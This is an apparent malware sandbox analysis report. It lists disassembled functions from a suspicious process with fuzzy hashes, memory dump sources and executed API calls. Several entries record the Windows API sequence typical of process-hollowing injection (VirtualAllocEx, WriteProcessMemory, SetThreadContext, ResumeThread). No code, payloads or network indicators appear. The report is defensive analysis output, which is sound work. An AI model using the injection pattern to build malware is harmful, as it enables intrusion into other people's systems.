Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59313c81f783aa8d888adbb424da28e743e644ace98cb08a21cabdab970798d7
Instruction ID: f455866b2412f661572c57f14bf1ceeb91e24a63543dffd584ec595c424b0733
Opcode Fuzzy Hash: 59313c81f783aa8d888adbb424da28e743e644ace98cb08a21cabdab970798d7
Instruction Fuzzy Hash: 05E1E874E102598FCB14DFA9C580AADFBF2FF89305F248169D818AB356D730A945CFA1

Function 0025C8F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76488f90b50a19a265e2a8084e246ad9fb887daef76d50aa1eb4284b5f2311e4
Instruction ID: a152088d940eb870b5afe8762007f575ed49cc301f04348771daf1d2621a14bb
Opcode Fuzzy Hash: 76488f90b50a19a265e2a8084e246ad9fb887daef76d50aa1eb4284b5f2311e4
Instruction Fuzzy Hash: B9E10A74E102598FCB14DFA9C580AADFBF2BF89305F248169D818AB356D731AD45CFA0

Function 0025CD30 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847475b21b39c3f3a5412759c64cbecb3069733136c0483b17c459efa72aa9c1
Instruction ID: 621b4f447648ced152156bc28180881022bc3254e94a21d3445cdb6c5fb5275b
Opcode Fuzzy Hash: 847475b21b39c3f3a5412759c64cbecb3069733136c0483b17c459efa72aa9c1
Instruction Fuzzy Hash: 28E11A74E102598FCB14DFA9C580AADFBF2BF89305F248169D818A7356D730AD45CF64

Function 00259150 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c35612eab8840fddf0a9e928a8e3de1bc2682303766dcd54352458d13c633a
Instruction ID: 4fc8cc80b412e4b66b15d189489703a8c5c9eb8434fdad4a39be05d51d6fea3d
Opcode Fuzzy Hash: 25c35612eab8840fddf0a9e928a8e3de1bc2682303766dcd54352458d13c633a
Instruction Fuzzy Hash: 1C414970D28219DFDB08CFAAC8446EEBBF6AB8D302F24D029D809E3251D7744995DF58

Function 0025CD20 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3526608ded117b266cffb764df549e54b14324061a38018237476a570a5fde0
Instruction ID: dedb6d008738cbe95267fa9faf51402396ca689c927d11cb7bdc303f32927d07
Opcode Fuzzy Hash: f3526608ded117b266cffb764df549e54b14324061a38018237476a570a5fde0
Instruction Fuzzy Hash: 42513B74E142598FDB14CFA9C5805AEFBF2BF89305F24816AD808A7356D7319D46CFA0

Function 00252358 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5d498fadab121ee59fdab877b1acc9c1d1173a43919314bdd07d21404b8f46
Instruction ID: 149b9c057e262400b2cf2c41d9d39a015b2f6b5f64a41d3d8ad3172dbf81f193
Opcode Fuzzy Hash: 2d5d498fadab121ee59fdab877b1acc9c1d1173a43919314bdd07d21404b8f46
Instruction Fuzzy Hash: 29418D70D2420ADFDB04CFA9D98469EFBF2FF89301F10946AC414A7294D7785A09CF55

Analysis Process: XxENUzWteJXT.exePID: 3472, Parent PID: 3424COMMON

Execution Graph

Execution Coverage:	19.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	201
Total number of Limit Nodes:	3

Executed Functions

Function 01F512B4 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1541357399bb8d5ae5a7c129fb7d0371eea6914b9a337f5f3370d7023f5f549
Instruction ID: 44b96535a71f6ec4ad6de2a102df4b0d3cf1ee629712efa5f29dda3e97b97ae2
Opcode Fuzzy Hash: b1541357399bb8d5ae5a7c129fb7d0371eea6914b9a337f5f3370d7023f5f549
Instruction Fuzzy Hash: A6B01213DDE2909EC7430C0404841F48BBC850B0A0F0B31425995A3803448B900B0689

Function 0017E5DD Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017E8AF

Strings

eC>, xrefs: 0017E652
eC>, xrefs: 0017E623

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: CreateProcess
String ID: eC>$eC>
API String ID: 963392458-2703793578
Opcode ID: 1dc755e91a3f9da7c5546e9c71f8b1be12eea4f8114a1cf0ad81f411b15c0fcd
Instruction ID: d440d2e168d81b6de3cd3b6295ff5a95be0f3b0eeab570427ed7e623b2c6b2c0
Opcode Fuzzy Hash: 1dc755e91a3f9da7c5546e9c71f8b1be12eea4f8114a1cf0ad81f411b15c0fcd
Instruction Fuzzy Hash: EFC11371D002298FDF24CFA8C841BEEBBF1BB09304F1095AAD959B7250DB749A85CF95

Function 0017E5E8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017E8AF

Strings

eC>, xrefs: 0017E652
eC>, xrefs: 0017E623

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: CreateProcess
String ID: eC>$eC>
API String ID: 963392458-2703793578
Opcode ID: 4be840002c3be1b5042b4e8df92c60836deac50cdb4d6e8715985448cddb9931
Instruction ID: 4fb04d070c0c8b98e28dbab228184bc51ffd9fca2ae59eb5ba1b6df775959384
Opcode Fuzzy Hash: 4be840002c3be1b5042b4e8df92c60836deac50cdb4d6e8715985448cddb9931
Instruction Fuzzy Hash: D6C10471D002298FDF24CFA8C841BEEBBF1BB09304F1095AAD919B7254DB749A85CF95

Function 0017E248 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E323

Strings

eC>, xrefs: 0017E272

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: eC>
API String ID: 3559483778-2138442192
Opcode ID: da8f122dbe55976584aeef81284a97267e80706b8fa9c16b649bf384a8f635f3
Instruction ID: eb0af42b7ccbacdc4af86ce3d8b8b6bc646d3b82934ccf5ff31aa0c505142201
Opcode Fuzzy Hash: da8f122dbe55976584aeef81284a97267e80706b8fa9c16b649bf384a8f635f3
Instruction Fuzzy Hash: C641ABB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D335AA55CF64

Function 0017E250 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E323

Strings

eC>, xrefs: 0017E272

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: eC>
API String ID: 3559483778-2138442192
Opcode ID: 744ad4cc128484dbe16d0ccf89d5b8e9e4ca2af4115f3c5a936e1fdd1ff75225
Instruction ID: b7b54cd0a5978cef8bff1ad221ae062e49314838799591d72b7ac9b0e3fced71
Opcode Fuzzy Hash: 744ad4cc128484dbe16d0ccf89d5b8e9e4ca2af4115f3c5a936e1fdd1ff75225
Instruction Fuzzy Hash: 1F41AAB5D012489FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D334AA55CF64

Function 0017E3A9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E462

Strings

eC>, xrefs: 0017E3D2

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: MemoryProcessRead
String ID: eC>
API String ID: 1726664587-2138442192
Opcode ID: 27259177f5d8fbf7b423e3098b9048fc95ebe5aeab9ddd2aad0c219f3568ca25
Instruction ID: 49be3c5c98c3e9f415a4b6367c6d72c4283f0eac166bc726c35f9e14df6714c6
Opcode Fuzzy Hash: 27259177f5d8fbf7b423e3098b9048fc95ebe5aeab9ddd2aad0c219f3568ca25
Instruction Fuzzy Hash: 2D4199B5D002589FCF10CFA9D984AEEFBB1BF49310F20942AE815B7240D735A955CF65

Function 0017E3B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017E462

Strings

eC>, xrefs: 0017E3D2

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: MemoryProcessRead
String ID: eC>
API String ID: 1726664587-2138442192
Opcode ID: 55d0ad6ab735500ca4c09ae1fe374814ce2e02b51187f2daded1e54b90b86010
Instruction ID: 1e4906ef23a4784ae1501f7db8971a628322b952ebd20cc5305dc0b24f9ad06a
Opcode Fuzzy Hash: 55d0ad6ab735500ca4c09ae1fe374814ce2e02b51187f2daded1e54b90b86010
Instruction Fuzzy Hash: 3B41A8B5D002589FCF10CFAAD984AEEFBB1BF49310F20942AE815B7240D735A955CF65

Function 0017E120 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017E1D2

Strings

eC>, xrefs: 0017E142

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: AllocVirtual
String ID: eC>
API String ID: 4275171209-2138442192
Opcode ID: cb8ac3516de6e4e9341c32d39016760a9db0c9bcc8103374a38acca59525e481
Instruction ID: b7614609b9c5c42e29c40ba069067ebdb50c649ab91dc1822caa0f7a70f661d7
Opcode Fuzzy Hash: cb8ac3516de6e4e9341c32d39016760a9db0c9bcc8103374a38acca59525e481
Instruction Fuzzy Hash: B341BAB5D002489FCF10CFA9D980AEEFBB1BF49310F20942AE815B7250D735A945CF54

Function 0017E128 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017E1D2

Strings

eC>, xrefs: 0017E142

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: AllocVirtual
String ID: eC>
API String ID: 4275171209-2138442192
Opcode ID: 95130e74039486a189e3f2e5fadb36820010834d309246459c43bcdfd3738962
Instruction ID: e2af5ffce51a147948422cfa15547c077a21dff4a2698a950fd489ad0a6b8edf
Opcode Fuzzy Hash: 95130e74039486a189e3f2e5fadb36820010834d309246459c43bcdfd3738962
Instruction Fuzzy Hash: 9241A9B4D002589FCF10CFA9D980AEEFBB1BB49310F20942AE814B7300D735A945CF65

Function 0017DBB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0017DC6F

Strings

eC>, xrefs: 0017DBDF

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: ContextThreadWow64
String ID: eC>
API String ID: 983334009-2138442192
Opcode ID: 2bdc3148a4240f196b538b3f16a7253b0b5eda1830e2d40cb8efb11823814b4a
Instruction ID: f2cdbf656cbb5b6c18936db406ed3a10e63e100d5fdc0be3c1653dbc74ebc859
Opcode Fuzzy Hash: 2bdc3148a4240f196b538b3f16a7253b0b5eda1830e2d40cb8efb11823814b4a
Instruction Fuzzy Hash: 9D41BCB5D002589FCF10CFA9D984AEEFBF1AF49314F24802AE418B7240D778A989CF54

Function 0017DBC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0017DC6F

Strings

eC>, xrefs: 0017DBDF

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: ContextThreadWow64
String ID: eC>
API String ID: 983334009-2138442192
Opcode ID: 9492741bf67b9c811bec8b496dce390a4ca11738551e0c6dcf52b2b7e7ac9bae
Instruction ID: 8cfdc0a13447706ef48bae6196099ddc769580ef4ccc5741a6f6c27e0c953c69
Opcode Fuzzy Hash: 9492741bf67b9c811bec8b496dce390a4ca11738551e0c6dcf52b2b7e7ac9bae
Instruction Fuzzy Hash: A041ACB5D0025C9FCF10CFA9D984AEEFBB1AF49314F24842AE418B7240D778A945CF54

Function 0017DAC9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0017DB4E

Strings

eC>, xrefs: 0017DAEA

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: ResumeThread
String ID: eC>
API String ID: 947044025-2138442192
Opcode ID: 4ff0c0bf33a83fc0961443166aa7978d570828cff077df1fc94c125661189763
Instruction ID: 92a0b0c9b22cb51a801e8471c20764b22804816aa493f03f6845bf9b3ae4ee27
Opcode Fuzzy Hash: 4ff0c0bf33a83fc0961443166aa7978d570828cff077df1fc94c125661189763
Instruction Fuzzy Hash: 7131BDB4D002189FCF14CFA9E984AEEFBB5AF49314F24942AE819B7300D735A945CF94

Function 0017DAD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0017DB4E

Strings

eC>, xrefs: 0017DAEA

Memory Dump Source

Source File: 0000000E.00000002.383240009.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_170000_XxENUzWteJXT.jbxd

Similarity

API ID: ResumeThread
String ID: eC>
API String ID: 947044025-2138442192
Opcode ID: 2bb2eb79767daf54fecc1b80d08ff30ec5f1ba7701d399eb824a0ff23e93bbfe
Instruction ID: f3b2c353b4129c6736d32877e994fc180596b87088bdb4fe832989a36c9143d2
Opcode Fuzzy Hash: 2bb2eb79767daf54fecc1b80d08ff30ec5f1ba7701d399eb824a0ff23e93bbfe
Instruction Fuzzy Hash: C931CDB4D002189FCF14CFA9E984AEEFBB5AF49314F24942AE819B7300D735A905CF94

Function 01F511F2 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

(, xrefs: 01F51450

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 6eda8cc7d39c28f58ec3c37788a11e85c97fe7e2f971488307b7d8add0854c4e
Instruction ID: 7bdf6bc05f7714a6a19a209fcbacb85115c72b0b22705ff1c292490f02130f84
Opcode Fuzzy Hash: 6eda8cc7d39c28f58ec3c37788a11e85c97fe7e2f971488307b7d8add0854c4e
Instruction Fuzzy Hash: BC01F63590A268CFEB60CFA4CD44BEDBBB9BB49305F1452D9D509A7291C336AE85CF10

Function 01F50F51 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda5c59ee1ee26dafaeffbe92f6a554036eb802f217c5771b15527e89c2027f0
Instruction ID: 4b2913eeff97f7ec6d9bf79f79a9df4b689b95a7fddd10095f15b053f4116705
Opcode Fuzzy Hash: cda5c59ee1ee26dafaeffbe92f6a554036eb802f217c5771b15527e89c2027f0
Instruction Fuzzy Hash: FE612B75909229CFDBA4CF54D844BECBBB5BB09301F1081EADA0DA3295DB31AAC5CF50

Function 01F50FEB Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d37998bd020af895e7e1985fe72983a25a9a13a146c724cd161af7a83958dc
Instruction ID: 1c4eedc338a33b1b2c0a4b27ecebc8594aa6ee5674d65c403d85b22cf1f15cda
Opcode Fuzzy Hash: 34d37998bd020af895e7e1985fe72983a25a9a13a146c724cd161af7a83958dc
Instruction Fuzzy Hash: D2412775D4921ACFDBA4CF95C840BECB7B5BF89301F1092A6DA0DA2245EB716AC5CF40

Function 01F50FE3 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a017ee16a07b3221706a76b3ec89aab4210ce6cef184c698b049a86d338fd4bb
Instruction ID: 3657c88be1dfd9cb1f63e6fe7c026c3ac83c39f742aa47e6d3bf5c1275c63f75
Opcode Fuzzy Hash: a017ee16a07b3221706a76b3ec89aab4210ce6cef184c698b049a86d338fd4bb
Instruction Fuzzy Hash: C341E775D4921ACFDBA4CF65C840BECBBB5BF59300F1092A6D60DA6244EB716AC5CF40

Function 01F50FBC Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 228436a175ffb3f55f76cf0f5d887e4939cde2428f96e4ce23ec11c2a7b0a2fe
Instruction ID: 4ce64d39af8b59918e747137890099fb5424734b04dd3a88ad8b9d5f308953e9
Opcode Fuzzy Hash: 228436a175ffb3f55f76cf0f5d887e4939cde2428f96e4ce23ec11c2a7b0a2fe
Instruction Fuzzy Hash: 2741F875D4525ACFDBA4CF54C840BE8BBB5BF59300F1082E6D609A7244EB716AC5CF40

Function 000DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02688c5c20277630b13fc66754fb556eee65a98d32cde8b0556d1d2ff9e40b56
Instruction ID: 611b70d539c5a395d32503d8413a34b8fbe3a7ad1223150efbfc78c43abc4433
Opcode Fuzzy Hash: 02688c5c20277630b13fc66754fb556eee65a98d32cde8b0556d1d2ff9e40b56
Instruction Fuzzy Hash: 5121AFB5604340AFDB25DF24D884B26BFA5EB84314F24C56BE8494B346C336D84ACBB1

Function 000DD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1424be14df7d630648e3d90623704b3438236d6b1a4cdb6bde149d881d162d0
Instruction ID: 4676ed8466ffa1aaa0c382fb1a5e72b8da5d5ed02d7fc65c5d6d6dfffe188e7d
Opcode Fuzzy Hash: e1424be14df7d630648e3d90623704b3438236d6b1a4cdb6bde149d881d162d0
Instruction Fuzzy Hash: 8621AFB5604340AFDB55CF14D980B26BBA5EB94314F24C5ABE8494B356C336D846CB61

Function 000DD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4902fddaa9b1baacf4630680d11b7c7e935e0573d7bba9ea49814211300c6f84
Instruction ID: bfc90ff0abd6077d3a94f4e8130be88d7da0e6a7c770f62ae3e317942078ee3d
Opcode Fuzzy Hash: 4902fddaa9b1baacf4630680d11b7c7e935e0573d7bba9ea49814211300c6f84
Instruction Fuzzy Hash: 60216F755093808FDB12CF24D994715BFB1EB86314F28C5EBD8498B697C33AD84ACB62

Function 01F51185 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f2d736033546b9e8ea3d941445f431cf8d8051144942278316bd618007b00e
Instruction ID: caad61b12af7b709e1dcb115f55edd6fdf4be316ec6fca3db0be9f4372ce7801
Opcode Fuzzy Hash: e4f2d736033546b9e8ea3d941445f431cf8d8051144942278316bd618007b00e
Instruction Fuzzy Hash: BE211779D08228CFDFA0CF64D8447EDBBB5AF4A305F144099D64AA3251DB326A86CF41

Function 000DD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383083192.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_dd000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: e380d15482013e35632295978a9d365b9fef28a8c9ff2bbf4d6be0dfcec7b39c
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: 04118B75904280DFDB52CF14D9C4B25BBA1FB94314F28C6AED8494B756C33AD84ACBA1

Function 01F506D0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ba1bb68b3f17e539c37f317dfaed6c4ec4663b30dcbee9515f0a1ad499de2f
Instruction ID: 4bcdf466ce57e059fbe825f6fea94de78b32ff7ecac929dc1944f1bdf2e423f2
Opcode Fuzzy Hash: 73ba1bb68b3f17e539c37f317dfaed6c4ec4663b30dcbee9515f0a1ad499de2f
Instruction Fuzzy Hash: 9311C5B4D0520ADFDB84DFA9D5456AEBFF1FB89300F1491AAD919A3304EB304A41CF91

Function 01F506D8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf0e6f9dbd9adb5ce04dc89448b29f3d090accb178169bab2255a2e33aa0499
Instruction ID: 18bed0220143866f184f1849a3f5aa40cf1e0b8c0bdc655f32cbae4583ab43c0
Opcode Fuzzy Hash: 3cf0e6f9dbd9adb5ce04dc89448b29f3d090accb178169bab2255a2e33aa0499
Instruction Fuzzy Hash: 371193B8D0420ADFDB84DFA9D5456AEBFF1BB88300F1491AAD919E3304EB344A41CF91

Function 01F506E0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ed61bc569799252c6661aa03d11c02b7cff1a6e025892204329188897a90d0
Instruction ID: dfe570bb945a74397c9e35e1c0c5c94b908a09559afeb6b9a4625f63a0c2a8ee
Opcode Fuzzy Hash: 60ed61bc569799252c6661aa03d11c02b7cff1a6e025892204329188897a90d0
Instruction Fuzzy Hash: 8811B3B8D0420ADFDB84DFA9D5456AEBBF5FB88300F1491AAD919E3304EB305A41CF91

Function 01F514A6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79c922a6b9553d51b4b6fc4cc4a361d45c64666f82a95a8ab6f05dda2b1b9dc
Instruction ID: ac0ce42561c977339a0be5d826bffb16645d94741dcf869b2d9e2aaed13343c3
Opcode Fuzzy Hash: f79c922a6b9553d51b4b6fc4cc4a361d45c64666f82a95a8ab6f05dda2b1b9dc
Instruction Fuzzy Hash: B4115AB0808218EFCB61DF28C8807D9BBB4FB4A301F0486D9C51DD6245C775AA85CF50

Function 01F510AA Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

